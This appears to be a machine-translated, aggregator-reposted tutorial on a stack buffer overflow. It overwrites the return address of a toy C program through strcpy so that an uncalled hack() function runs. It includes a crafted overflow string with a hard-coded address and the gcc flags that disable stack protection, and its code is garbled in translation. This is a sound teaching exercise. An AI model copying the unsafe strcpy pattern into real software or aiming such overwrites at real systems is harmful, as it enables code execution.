Shulou(Shulou.com)06/01 Report--

# include#includevoid fun (char * name) {char buf [10]; strcpy (buf,name); printf ("% s\ n", buf);} void hack () {printf ("flag\ n");} int main () {char name [] = "Alex@bbb"; fun (name); return 0;}

The above program is a normal C language program, but the hack () function is not called in the main function. I will demonstrate how to use the buffer overflow to execute the contents of the hack function.

After compiling and executing the above program using codeblocks, drag into od to check the changes in the stack and see what value is assigned to the variable name, which happens to overwrite the function return address at call fun.

F7 follow up F8 sentence by sentence:

So we add poc:

# include#includevoid fun (char * name) {char buf [10]; strcpy (buf,name); printf ("% s\ n", buf);} void hack () {printf ("flag\ n");} int main () {char name [] = "Alex@bbbaaaaaaaaaaaaaa\ x59\ x13\ x40\ 00"; / / the last four here are hack () function addresses fun (name); return 0;}

After recompiling and executing, we found that the utilization was successful:

When using ubuntu to reproduce stack overflow, you need to turn off the stack protection mechanism:

Use gcc to disable the protection mechanism at compile time, and the parameter-fno-stack-protector is used to turn off the gcc compiler gs CAPTCHA mechanism.

-z execstack is used to turn off the ld linker stack segment non-executable mechanism.

There is a 64-bit stack overflow process under linux.

Https://www.secpulse.com/archives/32328.html

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.